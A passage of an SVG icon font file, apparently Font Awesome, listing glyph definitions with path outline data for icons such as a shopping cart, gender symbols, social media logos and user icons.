t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1536 0q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1664 1088v-512q0 -24 -16 -42.5t-41 -21.5l-1044 -122q1 -7 4.5 -21.5t6 -26.5t2.5 -22q0 -16 -24 -64h920
q26 0 45 -19t19 -45t-19 -45t-45 -19h-1024q-26 0 -45 19t-19 45q0 14 11 39.5t29.5 59.5t20.5 38l-177 823h-204q-26 0 -45 19t-19 45t19 45t45 19h256q16 0 28.5 -6.5t20 -15.5t13 -24.5t7.5 -26.5t5.5 -29.5t4.5 -25.5h1201q26 0 45 -19t19 -45z" />
    <glyph glyph-name="_504" unicode="&#xf219;" horiz-adv-x="2048" 
d="M212 768l623 -665l-300 665h-323zM1024 -4l349 772h-698zM538 896l204 384h-262l-288 -384h346zM1213 103l623 665h-323zM683 896h682l-204 384h-274zM1510 896h346l-288 384h-262zM1651 1382l384 -512q14 -18 13 -41.5t-17 -40.5l-960 -1024q-18 -20 -47 -20t-47 20
l-960 1024q-16 17 -17 40.5t13 41.5l384 512q18 26 51 26h1152q33 0 51 -26z" />
    <glyph glyph-name="_505" unicode="&#xf21a;" horiz-adv-x="2048" 
d="M1811 -19q19 19 45 19t45 -19l128 -128l-90 -90l-83 83l-83 -83q-18 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83l-83 -83
q-19 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-128 128l90 90l83 -83l83 83q19 19 45 19t45 -19l83 -83l83 83q19 19 45 19t45 -19l83 -83l83 83q19 19 45 19t45 -19l83 -83l83 83q19 19 45 19t45 -19l83 -83l83 83q19 19 45 19t45 -19l83 -83l83 83
q19 19 45 19t45 -19l83 -83zM237 19q-19 -19 -45 -19t-45 19l-128 128l90 90l83 -82l83 82q19 19 45 19t45 -19l83 -82l64 64v293l-210 314q-17 26 -7 56.5t40 40.5l177 58v299h128v128h256v128h256v-128h256v-128h128v-299l177 -58q30 -10 40 -40.5t-7 -56.5l-210 -314
v-293l19 18q19 19 45 19t45 -19l83 -82l83 82q19 19 45 19t45 -19l128 -128l-90 -90l-83 83l-83 -83q-18 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83l-83 -83
q-19 -19 -45 -19t-45 19l-83 83l-83 -83q-19 -19 -45 -19t-45 19l-83 83zM640 1152v-128l384 128l384 -128v128h-128v128h-512v-128h-128z" />
    <glyph glyph-name="_506" unicode="&#xf21b;" 
d="M576 0l96 448l-96 128l-128 64zM832 0l128 640l-128 -64l-96 -128zM992 1010q-2 4 -4 6q-10 8 -96 8q-70 0 -167 -19q-7 -2 -21 -2t-21 2q-97 19 -167 19q-86 0 -96 -8q-2 -2 -4 -6q2 -18 4 -27q2 -3 7.5 -6.5t7.5 -10.5q2 -4 7.5 -20.5t7 -20.5t7.5 -17t8.5 -17t9 -14
t12 -13.5t14 -9.5t17.5 -8t20.5 -4t24.5 -2q36 0 59 12.5t32.5 30t14.5 34.5t11.5 29.5t17.5 12.5h12q11 0 17.5 -12.5t11.5 -29.5t14.5 -34.5t32.5 -30t59 -12.5q13 0 24.5 2t20.5 4t17.5 8t14 9.5t12 13.5t9 14t8.5 17t7.5 17t7 20.5t7.5 20.5q2 7 7.5 10.5t7.5 6.5
q2 9 4 27zM1408 131q0 -121 -73 -190t-194 -69h-874q-121 0 -194 69t-73 190q0 61 4.5 118t19 125.5t37.5 123.5t63.5 103.5t93.5 74.5l-90 220h214q-22 64 -22 128q0 12 2 32q-194 40 -194 96q0 57 210 99q17 62 51.5 134t70.5 114q32 37 76 37q30 0 84 -31t84 -31t84 31
t84 31q44 0 76 -37q36 -42 70.5 -114t51.5 -134q210 -42 210 -99q0 -56 -194 -96q7 -81 -20 -160h214l-82 -225q63 -33 107.5 -96.5t65.5 -143.5t29 -151.5t8 -148.5z" />
    <glyph glyph-name="_507" unicode="&#xf21c;" horiz-adv-x="2304" 
d="M2301 500q12 -103 -22 -198.5t-99 -163.5t-158.5 -106t-196.5 -31q-161 11 -279.5 125t-134.5 274q-12 111 27.5 210.5t118.5 170.5l-71 107q-96 -80 -151 -194t-55 -244q0 -27 -18.5 -46.5t-45.5 -19.5h-256h-69q-23 -164 -149 -274t-294 -110q-185 0 -316.5 131.5
t-131.5 316.5t131.5 316.5t316.5 131.5q76 0 152 -27l24 45q-123 110 -304 110h-64q-26 0 -45 19t-19 45t19 45t45 19h128q78 0 145 -13.5t116.5 -38.5t71.5 -39.5t51 -36.5h512h115l-85 128h-222q-30 0 -49 22.5t-14 52.5q4 23 23 38t43 15h253q33 0 53 -28l70 -105
l114 114q19 19 46 19h101q26 0 45 -19t19 -45v-128q0 -26 -19 -45t-45 -19h-179l115 -172q131 63 275 36q143 -26 244 -134.5t118 -253.5zM448 128q115 0 203 72.5t111 183.5h-314q-35 0 -55 31q-18 32 -1 63l147 277q-47 13 -91 13q-132 0 -226 -94t-94 -226t94 -226
t226 -94zM1856 128q132 0 226 94t94 226t-94 226t-226 94q-60 0 -121 -24l174 -260q15 -23 10 -49t-27 -40q-15 -11 -36 -11q-35 0 -53 29l-174 260q-93 -95 -93 -225q0 -132 94 -226t226 -94z" />
    <glyph glyph-name="_508" unicode="&#xf21d;" 
d="M1408 0q0 -63 -61.5 -113.5t-164 -81t-225 -46t-253.5 -15.5t-253.5 15.5t-225 46t-164 81t-61.5 113.5q0 49 33 88.5t91 66.5t118 44.5t131 29.5q26 5 48 -10.5t26 -41.5q5 -26 -10.5 -48t-41.5 -26q-58 -10 -106 -23.5t-76.5 -25.5t-48.5 -23.5t-27.5 -19.5t-8.5 -12
q3 -11 27 -26.5t73 -33t114 -32.5t160.5 -25t201.5 -10t201.5 10t160.5 25t114 33t73 33.5t27 27.5q-1 4 -8.5 11t-27.5 19t-48.5 23.5t-76.5 25t-106 23.5q-26 4 -41.5 26t-10.5 48q4 26 26 41.5t48 10.5q71 -12 131 -29.5t118 -44.5t91 -66.5t33 -88.5zM1024 896v-384
q0 -26 -19 -45t-45 -19h-64v-384q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v384h-64q-26 0 -45 19t-19 45v384q0 53 37.5 90.5t90.5 37.5h384q53 0 90.5 -37.5t37.5 -90.5zM928 1280q0 -93 -65.5 -158.5t-158.5 -65.5t-158.5 65.5t-65.5 158.5t65.5 158.5t158.5 65.5
t158.5 -65.5t65.5 -158.5z" />
    <glyph glyph-name="_509" unicode="&#xf21e;" horiz-adv-x="1792" 
d="M1280 512h305q-5 -6 -10 -10.5t-9 -7.5l-3 -4l-623 -600q-18 -18 -44 -18t-44 18l-624 602q-5 2 -21 20h369q22 0 39.5 13.5t22.5 34.5l70 281l190 -667q6 -20 23 -33t39 -13q21 0 38 13t23 33l146 485l56 -112q18 -35 57 -35zM1792 940q0 -145 -103 -300h-369l-111 221
q-8 17 -25.5 27t-36.5 8q-45 -5 -56 -46l-129 -430l-196 686q-6 20 -23.5 33t-39.5 13t-39 -13.5t-22 -34.5l-116 -464h-423q-103 155 -103 300q0 220 127 344t351 124q62 0 126.5 -21.5t120 -58t95.5 -68.5t76 -68q36 36 76 68t95.5 68.5t120 58t126.5 21.5q224 0 351 -124
t127 -344z" />
    <glyph glyph-name="venus" unicode="&#xf221;" horiz-adv-x="1280" 
d="M1152 960q0 -221 -147.5 -384.5t-364.5 -187.5v-260h224q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-224v-224q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v224h-224q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h224v260q-150 16 -271.5 103t-186 224t-52.5 292
q11 134 80.5 249t182 188t245.5 88q170 19 319 -54t236 -212t87 -306zM128 960q0 -185 131.5 -316.5t316.5 -131.5t316.5 131.5t131.5 316.5t-131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5z" />
    <glyph glyph-name="_511" unicode="&#xf222;" 
d="M1472 1408q26 0 45 -19t19 -45v-416q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v262l-382 -383q126 -156 126 -359q0 -117 -45.5 -223.5t-123 -184t-184 -123t-223.5 -45.5t-223.5 45.5t-184 123t-123 184t-45.5 223.5t45.5 223.5t123 184t184 123t223.5 45.5
q203 0 359 -126l382 382h-261q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h416zM576 0q185 0 316.5 131.5t131.5 316.5t-131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
    <glyph glyph-name="_512" unicode="&#xf223;" horiz-adv-x="1280" 
d="M830 1220q145 -72 233.5 -210.5t88.5 -305.5q0 -221 -147.5 -384.5t-364.5 -187.5v-132h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-96v-96q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v96h-96q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96v132q-217 24 -364.5 187.5
t-147.5 384.5q0 167 88.5 305.5t233.5 210.5q-165 96 -228 273q-6 16 3.5 29.5t26.5 13.5h69q21 0 29 -20q44 -106 140 -171t214 -65t214 65t140 171q8 20 37 20h61q17 0 26.5 -13.5t3.5 -29.5q-63 -177 -228 -273zM576 256q185 0 316.5 131.5t131.5 316.5t-131.5 316.5
t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
    <glyph glyph-name="_513" unicode="&#xf224;" 
d="M1024 1504q0 14 9 23t23 9h288q26 0 45 -19t19 -45v-288q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v134l-254 -255q126 -158 126 -359q0 -221 -147.5 -384.5t-364.5 -187.5v-132h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-96v-96q0 -14 -9 -23t-23 -9h-64
q-14 0 -23 9t-9 23v96h-96q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96v132q-149 16 -270.5 103t-186.5 223.5t-53 291.5q16 204 160 353.5t347 172.5q118 14 228 -19t198 -103l255 254h-134q-14 0 -23 9t-9 23v64zM576 256q185 0 316.5 131.5t131.5 316.5t-131.5 316.5
t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
    <glyph glyph-name="_514" unicode="&#xf225;" horiz-adv-x="1792" 
d="M1280 1504q0 14 9 23t23 9h288q26 0 45 -19t19 -45v-288q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v134l-254 -255q126 -158 126 -359q0 -221 -147.5 -384.5t-364.5 -187.5v-132h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-96v-96q0 -14 -9 -23t-23 -9h-64
q-14 0 -23 9t-9 23v96h-96q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96v132q-217 24 -364.5 187.5t-147.5 384.5q0 201 126 359l-52 53l-101 -111q-9 -10 -22 -10.5t-23 7.5l-48 44q-10 8 -10.5 21.5t8.5 23.5l105 115l-111 112v-134q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9
t-9 23v288q0 26 19 45t45 19h288q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-133l106 -107l86 94q9 10 22 10.5t23 -7.5l48 -44q10 -8 10.5 -21.5t-8.5 -23.5l-90 -99l57 -56q158 126 359 126t359 -126l255 254h-134q-14 0 -23 9t-9 23v64zM832 256q185 0 316.5 131.5
t131.5 316.5t-131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
    <glyph glyph-name="_515" unicode="&#xf226;" horiz-adv-x="1792" 
d="M1790 1007q12 -155 -52.5 -292t-186 -224t-271.5 -103v-260h224q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-224v-224q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v224h-512v-224q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v224h-224q-14 0 -23 9t-9 23v64q0 14 9 23
t23 9h224v260q-150 16 -271.5 103t-186 224t-52.5 292q17 206 164.5 356.5t352.5 169.5q206 21 377 -94q171 115 377 94q205 -19 352.5 -169.5t164.5 -356.5zM896 647q128 131 128 313t-128 313q-128 -131 -128 -313t128 -313zM576 512q115 0 218 57q-154 165 -154 391
q0 224 154 391q-103 57 -218 57q-185 0 -316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5zM1152 128v260q-137 15 -256 94q-119 -79 -256 -94v-260h512zM1216 512q185 0 316.5 131.5t131.5 316.5t-131.5 316.5t-316.5 131.5q-115 0 -218 -57q154 -167 154 -391
q0 -226 -154 -391q103 -57 218 -57z" />
    <glyph glyph-name="_516" unicode="&#xf227;" horiz-adv-x="1920" 
d="M1536 1120q0 14 9 23t23 9h288q26 0 45 -19t19 -45v-288q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v134l-254 -255q76 -95 107.5 -214t9.5 -247q-31 -182 -166 -312t-318 -156q-210 -29 -384.5 80t-241.5 300q-117 6 -221 57.5t-177.5 133t-113.5 192.5t-32 230
q9 135 78 252t182 191.5t248 89.5q118 14 227.5 -19t198.5 -103l255 254h-134q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h288q26 0 45 -19t19 -45v-288q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v134l-254 -255q59 -74 93 -169q182 -9 328 -124l255 254h-134q-14 0 -23 9
t-9 23v64zM1024 704q0 20 -4 58q-162 -25 -271 -150t-109 -292q0 -20 4 -58q162 25 271 150t109 292zM128 704q0 -168 111 -294t276 -149q-3 29 -3 59q0 210 135 369.5t338 196.5q-53 120 -163.5 193t-245.5 73q-185 0 -316.5 -131.5t-131.5 -316.5zM1088 -128
q185 0 316.5 131.5t131.5 316.5q0 168 -111 294t-276 149q3 -28 3 -59q0 -210 -135 -369.5t-338 -196.5q53 -120 163.5 -193t245.5 -73z" />
    <glyph glyph-name="_517" unicode="&#xf228;" horiz-adv-x="2048" 
d="M1664 1504q0 14 9 23t23 9h288q26 0 45 -19t19 -45v-288q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v134l-254 -255q76 -95 107.5 -214t9.5 -247q-32 -180 -164.5 -310t-313.5 -157q-223 -34 -409 90q-117 -78 -256 -93v-132h96q14 0 23 -9t9 -23v-64q0 -14 -9 -23
t-23 -9h-96v-96q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v96h-96q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h96v132q-155 17 -279.5 109.5t-187 237.5t-39.5 307q25 187 159.5 322.5t320.5 164.5q224 34 410 -90q146 97 320 97q201 0 359 -126l255 254h-134q-14 0 -23 9
t-9 23v64zM896 391q128 131 128 313t-128 313q-128 -131 -128 -313t128 -313zM128 704q0 -185 131.5 -316.5t316.5 -131.5q117 0 218 57q-154 167 -154 391t154 391q-101 57 -218 57q-185 0 -316.5 -131.5t-131.5 -316.5zM1216 256q185 0 316.5 131.5t131.5 316.5
t-131.5 316.5t-316.5 131.5q-117 0 -218 -57q154 -167 154 -391t-154 -391q101 -57 218 -57z" />
    <glyph glyph-name="_518" unicode="&#xf229;" 
d="M1472 1408q26 0 45 -19t19 -45v-416q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v262l-213 -214l140 -140q9 -10 9 -23t-9 -22l-46 -46q-9 -9 -22 -9t-23 9l-140 141l-78 -79q126 -156 126 -359q0 -117 -45.5 -223.5t-123 -184t-184 -123t-223.5 -45.5t-223.5 45.5
t-184 123t-123 184t-45.5 223.5t45.5 223.5t123 184t184 123t223.5 45.5q203 0 359 -126l78 78l-172 172q-9 10 -9 23t9 22l46 46q9 9 22 9t23 -9l172 -172l213 213h-261q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h416zM576 0q185 0 316.5 131.5t131.5 316.5t-131.5 316.5
t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
    <glyph glyph-name="_519" unicode="&#xf22a;" horiz-adv-x="1280" 
d="M640 892q217 -24 364.5 -187.5t147.5 -384.5q0 -167 -87 -306t-236 -212t-319 -54q-133 15 -245.5 88t-182 188t-80.5 249q-12 155 52.5 292t186 224t271.5 103v132h-160q-14 0 -23 9t-9 23v64q0 14 9 23t23 9h160v165l-92 -92q-10 -9 -23 -9t-22 9l-46 46q-9 9 -9 22
t9 23l202 201q19 19 45 19t45 -19l202 -201q9 -10 9 -23t-9 -22l-46 -46q-9 -9 -22 -9t-23 9l-92 92v-165h160q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-160v-132zM576 -128q185 0 316.5 131.5t131.5 316.5t-131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5
t131.5 -316.5t316.5 -131.5z" />
    <glyph glyph-name="_520" unicode="&#xf22b;" horiz-adv-x="2048" 
d="M1901 621q19 -19 19 -45t-19 -45l-294 -294q-9 -10 -22.5 -10t-22.5 10l-45 45q-10 9 -10 22.5t10 22.5l185 185h-294v-224q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v224h-132q-24 -217 -187.5 -364.5t-384.5 -147.5q-167 0 -306 87t-212 236t-54 319q15 133 88 245.5
t188 182t249 80.5q155 12 292 -52.5t224 -186t103 -271.5h132v224q0 14 9 23t23 9h64q14 0 23 -9t9 -23v-224h294l-185 185q-10 9 -10 22.5t10 22.5l45 45q9 10 22.5 10t22.5 -10zM576 128q185 0 316.5 131.5t131.5 316.5t-131.5 316.5t-316.5 131.5t-316.5 -131.5
t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
    <glyph glyph-name="_521" unicode="&#xf22c;" horiz-adv-x="1280" 
d="M1152 960q0 -221 -147.5 -384.5t-364.5 -187.5v-612q0 -14 -9 -23t-23 -9h-64q-14 0 -23 9t-9 23v612q-217 24 -364.5 187.5t-147.5 384.5q0 117 45.5 223.5t123 184t184 123t223.5 45.5t223.5 -45.5t184 -123t123 -184t45.5 -223.5zM576 512q185 0 316.5 131.5
t131.5 316.5t-131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5z" />
    <glyph glyph-name="_522" unicode="&#xf22d;" horiz-adv-x="1280" 
d="M1024 576q0 185 -131.5 316.5t-316.5 131.5t-316.5 -131.5t-131.5 -316.5t131.5 -316.5t316.5 -131.5t316.5 131.5t131.5 316.5zM1152 576q0 -117 -45.5 -223.5t-123 -184t-184 -123t-223.5 -45.5t-223.5 45.5t-184 123t-123 184t-45.5 223.5t45.5 223.5t123 184t184 123
t223.5 45.5t223.5 -45.5t184 -123t123 -184t45.5 -223.5z" />
    <glyph glyph-name="_523" unicode="&#xf22e;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="_524" unicode="&#xf22f;" horiz-adv-x="1792" 
 />
    <glyph glyph-name="_525" unicode="&#xf230;" 
d="M1451 1408q35 0 60 -25t25 -60v-1366q0 -35 -25 -60t-60 -25h-391v595h199l30 232h-229v148q0 56 23.5 84t91.5 28l122 1v207q-63 9 -178 9q-136 0 -217.5 -80t-81.5 -226v-171h-200v-232h200v-595h-735q-35 0 -60 25t-25 60v1366q0 35 25 60t60 25h1366z" />
    <glyph glyph-name="_526" unicode="&#xf231;" horiz-adv-x="1280" 
d="M0 939q0 108 37.5 203.5t103.5 166.5t152 123t185 78t202 26q158 0 294 -66.5t221 -193.5t85 -287q0 -96 -19 -188t-60 -177t-100 -149.5t-145 -103t-189 -38.5q-68 0 -135 32t-96 88q-10 -39 -28 -112.5t-23.5 -95t-20.5 -71t-26 -71t-32 -62.5t-46 -77.5t-62 -86.5
l-14 -5l-9 10q-15 157 -15 188q0 92 21.5 206.5t66.5 287.5t52 203q-32 65 -32 169q0 83 52 156t132 73q61 0 95 -40.5t34 -102.5q0 -66 -44 -191t-44 -187q0 -63 45 -104.5t109 -41.5q55 0 102 25t78.5 68t56 95t38 110.5t20 111t6.5 99.5q0 173 -109.5 269.5t-285.5 96.5
q-200 0 -334 -129.5t-134 -328.5q0 -44 12.5 -85t27 -65t27 -45.5t12.5 -30.5q0 -28 -15 -73t-37 -45q-2 0 -17 3q-51 15 -90.5 56t-61 94.5t-32.5 108t-11 106.5z" />
    <glyph glyph-name="_527" unicode="&#xf232;" 
d="M985 562q13 0 97.5 -44t89.5 -53q2 -5 2 -15q0 -33 -17 -76q-16 -39 -71 -65.5t-102 -26.5q-57 0 -190 62q-98 45 -170 118t-148 185q-72 107 -71 194v8q3 91 74 158q24 22 52 22q6 0 18 -1.5t19 -1.5q19 0 26.5 -6.5t15.5 -27.5q8 -20 33 -88t25 -75q0 -21 -34.5 -57.5
t-34.5 -46.5q0 -7 5 -15q34 -73 102 -137q56 -53 151 -101q12 -7 22 -7q15 0 54 48.5t52 48.5zM782 32q127 0 243.5 50t200.5 134t134 200.5t50 243.5t-50 243.5t-134 200.5t-200.5 134t-243.5 50t-243.5 -50t-200.5 -134t-134 -200.5t-50 -243.5q0 -203 120 -368l-79 -233
l242 77q158 -104 345 -104zM782 1414q153 0 292.5 -60t240.5 -161t161 -240.5t60 -292.5t-60 -292.5t-161 -240.5t-240.5 -161t-292.5 -60q-195 0 -365 94l-417 -134l136 405q-108 178 -108 389q0 153 60 292.5t161 240.5t240.5 161t292.5 60z" />
    <glyph glyph-name="_528" unicode="&#xf233;" horiz-adv-x="1792" 
d="M128 128h1024v128h-1024v-128zM128 640h1024v128h-1024v-128zM1696 192q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM128 1152h1024v128h-1024v-128zM1696 704q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM1696 1216
q0 40 -28 68t-68 28t-68 -28t-28 -68t28 -68t68 -28t68 28t28 68zM1792 384v-384h-1792v384h1792zM1792 896v-384h-1792v384h1792zM1792 1408v-384h-1792v384h1792z" />
    <glyph glyph-name="_529" unicode="&#xf234;" horiz-adv-x="2048" 
d="M704 640q-159 0 -271.5 112.5t-112.5 271.5t112.5 271.5t271.5 112.5t271.5 -112.5t112.5 -271.5t-112.5 -271.5t-271.5 -112.5zM1664 512h352q13 0 22.5 -9.5t9.5 -22.5v-192q0 -13 -9.5 -22.5t-22.5 -9.5h-352v-352q0 -13 -9.5 -22.5t-22.5 -9.5h-192q-13 0 -22.5 9.5
t-9.5 22.5v352h-352q-13 0 -22.5 9.5t-9.5 22.5v192q0 13 9.5 22.5t22.5 9.5h352v352q0 13 9.5 22.5t22.5 9.5h192q13 0 22.5 -9.5t9.5 -22.5v-352zM928 288q0 -52 38 -90t90 -38h256v-238q-68 -50 -171 -50h-874q-121 0 -194 69t-73 190q0 53 3.5 103.5t14 109t26.5 108.5
t43 97.5t62 81t85.5 53.5t111.5 20q19 0 39 -17q79 -61 154.5 -91.5t164.5 -30.5t164.5 30.5t154.5 91.5q20 17 39 17q132 0 217 -96h-223q-52 0 -90 -38t-38 -90v-192z" />
    <glyph glyph-name="_530" unicode="&#xf235;" horiz-adv-x="2048" 
d="M704 640q-159 0 -271.5 112.5t-112.5 271.5t112.5 271.5t271.5 112.5t271.5 -112.5t112.5 -271.5t-112.5 -271.5t-271.5 -112.5zM1781 320l249 -249q9 -9 9 -23q0 -13 -9 -22l-136 -136q-9 -9 -22 -9q-14 0 -23 9l-249 249l-249 -249q-9 -9 -23 -9q-13 0 -22 9l-136 136
q-9 9 -9 22q0 14 9 23l249 249l-249 249q-9 9 -9 23q0 13 9 22l136 136q9 9 22 9q14 0 23 -9l249 -249l249 249q9 9 23 9q13 0 22 -9l136 -136q9 -9 9 -22q0 -14 -9 -23zM1283 320l-181 -181q-37 -37 -37 -91q0 -53 37 -90l83 -83q-21 -3 -44 -3h-874q-121 0 -194 69
t-73 190q0 53 3.5 103.5t14 109t26.5 108.5t43 97.5t62 81t85.5 53.5t111.5 20q19 0 39 -17q154 -122 319 -122t319 122q20 17 39 17q28 0 57 -6q-28 -27 -41 -50t-13 -56q0 -54 37 -91z" />
    <glyph glyph-name="_531" unicode="&#xf236;" horiz-adv-x="2048" 
d="M256 512h1728q26 0 45 -19t19 -45v-448h-256v256h-1536v-256h-256v1216q0 26 19 45t45 19h128q26 0 45 -19t19 -45v-704zM832 832q0 106 -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM2048 576v64q0 159 -112.5 271.5t-271.5 112.5h-704
q-26 0 -45 -19t-19 -45v-384h1152z" />
    <glyph glyph-name="_532" unicode="&#xf237;" 
d="M1536 1536l-192 -448h192v-192h-274l-55 -128h329v-192h-411l-357 -832l-357 832h-411v192h329l-55 128h-274v192h192l-192 448h256l323 -768h378l323 768h256zM768 320l108 256h-216z" />
    <glyph glyph-name="_533" unicode="&#xf238;" 
d="M1088 1536q185 0 316.5 -93.5t131.5 -226.5v-896q0 -130 -125.5 -222t-305.5 -97l213 -202q16 -15 8 -35t-30 -20h-1056q-22 0 -30 20t8 35l213 202q-180 5 -305.5 97t-125.5 222v896q0 133 131.5 226.5t316.5 93.5h640zM768 192q80 0 136 56t56 136t-56 136t-136 56
t-136 -56t-56 -136t56 -136t136 -56zM1344 768v512h-1152v-512h1152z" />
    <glyph glyph-name="_534" unicode="&#xf239;" 
d="M1088 1536q185 0 316.5 -93.5t131.5 -226.5v-896q0 -130 -125.5 -222t-305.5 -97l213 -202q16 -15 8 -35t-30 -20h-1056q-22 0 -30 20t8 35l213 202q-180 5 -305.5 97t-125.5 222v896q0 133 131.5 226.5t316.5 93.5h640zM288 224q66 0 113 47t47 113t-47 113t-113 47
t-113 -47t-47 -113t47 -113t113 -47zM704 768v512h-544v-512h544zM1248 224q66 0 113 47t47 113t-47 113t-113 47t-113 -47t-47 -113t47 -113t113 -47zM1408 768v512h-576v-512h576z" />
    <glyph glyph-name="_535" unicode="&#xf23a;" horiz-adv-x="1792" 
d="M597 1115v-1173q0 -25 -12.5 -42.5t-36.5 -17.5q-17 0 -33 8l-465 233q-21 10 -35.5 33.5t-14.5 46.5v1140q0 20 10 34t29 14q14 0 44 -15l511 -256q3 -3 3 -5zM661 1014l534 -866l-534 266v600zM1792 996v-1054q0 -25 -14 -40.5t-38 -15.5t-47 13l-441 220zM1789 1116
q0 -3 -256.5 -419.5t-300.5 -487.5l-390 634l324 527q17 28 52 28q14 0 26 -6l541 -270q4 -2 4 -6z" />
    <glyph glyph-name="_536" unicode="&#xf23b;" 
d="M809 532l266 499h-112l-157 -312q-24 -48 -44 -92l-42 92l-155 312h-120l263 -493v-324h101v318zM1536 1408v-1536h-1536v1536h1536z" />
    <glyph glyph-name="_537" unicode="&#xf23c;" horiz-adv-x="2296" 
d="M478 -139q-8 -16 -27 -34.5t-37 -25.5q-25 -9 -51.5 3.5t-28.5 31.5q-1 22 40 55t68 38q23 4 34 -21.5t2 -46.5zM1819 -139q7 -16 26 -34.5t38 -25.5q25 -9 51.5 3.5t27.5 31.5q2 22 -39.5 55t-68.5 38q-22 4 -33 -21.5t-2 -46.5zM1867 -30q13 -27 56.5 -59.5t77.5 -41.5
q45 -13 82 4.5t37 50.5q0 46 -67.5 100.5t-115.5 59.5q-40 5 -63.5 -37.5t-6.5 -76.5zM428 -30q-13 -27 -56 -59.5t-77 -41.5q-45 -13 -82 4.5t-37 50.5q0 46 67.5 100.5t115.5 59.5q40 5 63 -37.5t6 -76.5zM1158 1094h1q-41 0 -76 -15q27 -8 44 -30.5t17 -49.5
q0 -35 -27 -60t-65 -25q-52 0 -80 43q-5 -23 -5 -42q0 -74 56 -126.5t135 -52.5q80 0 136 52.5t56 126.5t-56 126.5t-136 52.5zM1462 1312q-99 109 -220.5 131.5t-245.5 -44.5q27 60 82.5 96.5t118 39.5t121.5 -17t99.5 -74.5t44.5 -131.5zM2212 73q8 -11 -11 -42
q7 -23 7 -40q1 -56 -44.5 -112.5t-109.5 -91.5t-118 -37q-48 -2 -92 21.5t-66 65.5q-687 -25 -1259 0q-23 -41 -66.5 -65t-92.5 -22q-86 3 -179.5 80.5t-92.5 160.5q2 22 7 40q-19 31 -11 42q6 10 31 1q14 22 41 51q-7 29 2 38q11 10 39 -4q29 20 59 34q0 29 13 37
q23 12 51 -16q35 5 61 -2q18 -4 38 -19v73q-11 0 -18 2q-53 10 -97 44.5t-55 87.5q-9 38 0 81q15 62 93 95q2 17 19 35.5t36 23.5t33 -7.5t19 -30.5h13q46 -5 60 -23q3 -3 5 -7q10 1 30.5 3.5t30.5 3.5q-15 11 -30 17q-23 40 -91 43q0 6 1 10q-62 2 -118.5 18.5t-84.5 47.5
q-32 36 -42.5 92t-2.5 112q16 126 90 179q23 16 52 4.5t32 -40.5q0 -1 1.5 -14t2.5 -21t3 -20t5.5 -19t8.5 -10q27 -14 76 -12q48 46 98 74q-40 4 -162 -14l47 46q61 58 163 111q145 73 282 86q-20 8 -41 15.5t-47 14t-42.5 10.5t-47.5 11t-43 10q595 126 904 -139
